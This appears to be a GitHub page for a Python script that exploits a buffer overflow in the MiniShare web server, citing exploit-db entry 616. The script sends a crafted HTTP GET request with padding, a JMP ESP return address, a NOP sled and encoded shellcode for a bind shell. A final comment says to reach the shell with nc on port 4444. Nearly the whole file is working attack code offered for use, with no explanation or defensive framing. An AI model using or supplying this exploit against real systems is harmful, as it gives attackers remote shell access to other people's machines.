-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathminishare_bindShell.py
55 lines (43 loc) · 2.04 KB
/
minishare_bindShell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/python
#
# exploit DB URL : https://www.exploit-db.com/exploits/616/
#usage : ./minishare_bindShell.py 192.168.100.10
import socket, sys
# Create a socket .
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# get IP from STDIN and connect to Port 80
sock.connect((sys.argv[1], 80))
# Setting Payload format
buffer = "GET "
buffer +="A"*1787
buffer +="\x53\x93\x42\x7e" # JMP ESP USER32.DLL
buffer +="\x90"*25
buffer +=("\xba\xd1\x7e\x43\xef\xdb\xd9\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x53\x31\x57\x12\x83\xef\xfc\x03\x86\x70\xa1\x1a\xd4\x65\xa7"
"\xe5\x24\x76\xc8\x6c\xc1\x47\xc8\x0b\x82\xf8\xf8\x58\xc6\xf4"
"\x73\x0c\xf2\x8f\xf6\x99\xf5\x38\xbc\xff\x38\xb8\xed\x3c\x5b"
"\x3a\xec\x10\xbb\x03\x3f\x65\xba\x44\x22\x84\xee\x1d\x28\x3b"
"\x1e\x29\x64\x80\x95\x61\x68\x80\x4a\x31\x8b\xa1\xdd\x49\xd2"
"\x61\xdc\x9e\x6e\x28\xc6\xc3\x4b\xe2\x7d\x37\x27\xf5\x57\x09"
"\xc8\x5a\x96\xa5\x3b\xa2\xdf\x02\xa4\xd1\x29\x71\x59\xe2\xee"
"\x0b\x85\x67\xf4\xac\x4e\xdf\xd0\x4d\x82\x86\x93\x42\x6f\xcc"
"\xfb\x46\x6e\x01\x70\x72\xfb\xa4\x56\xf2\xbf\x82\x72\x5e\x1b"
"\xaa\x23\x3a\xca\xd3\x33\xe5\xb3\x71\x38\x08\xa7\x0b\x63\x45"
"\x04\x26\x9b\x95\x02\x31\xe8\xa7\x8d\xe9\x66\x84\x46\x34\x71"
"\xeb\x7c\x80\xed\x12\x7f\xf1\x24\xd1\x2b\xa1\x5e\xf0\x53\x2a"
"\x9e\xfd\x81\xc7\x96\x58\x7a\xfa\x5b\x1a\x2a\xba\xf3\xf3\x20"
"\x35\x2c\xe3\x4a\x9f\x45\x8c\xb6\x20\x78\x11\x3e\xc6\x10\xb9"
"\x16\x50\x8c\x7b\x4d\x69\x2b\x83\xa7\xc1\xdb\xcc\xa1\xd6\xe4"
"\xcc\xe7\x70\x72\x47\xe4\x44\x63\x58\x21\xed\xf4\xcf\xbf\x7c"
"\xb7\x6e\xbf\x54\x2f\x12\x52\x33\xaf\x5d\x4f\xec\xf8\x0a\xa1"
"\xe5\x6c\xa7\x98\x5f\x92\x3a\x7c\xa7\x16\xe1\xbd\x26\x97\x64"
"\xf9\x0c\x87\xb0\x02\x09\xf3\x6c\x55\xc7\xad\xca\x0f\xa9\x07"
"\x85\xfc\x63\xcf\x50\xcf\xb3\x89\x5c\x1a\x42\x75\xec\xf3\x13"
"\x8a\xc1\x93\x93\xf3\x3f\x04\x5b\x2e\x84\x34\x16\x72\xad\xdc"
"\xff\xe7\xef\x80\xff\xd2\x2c\xbd\x83\xd6\xcc\x3a\x9b\x93\xc9"
"\x07\x1b\x48\xa0\x18\xce\x6e\x17\x18\xdb")
buffer += " HTTP/1.1\r\n\r\n"
print "Sending Payload with " + len(buffer)
sock.send(buffer)
sock.close()
# using nc host 4444 to connect to shell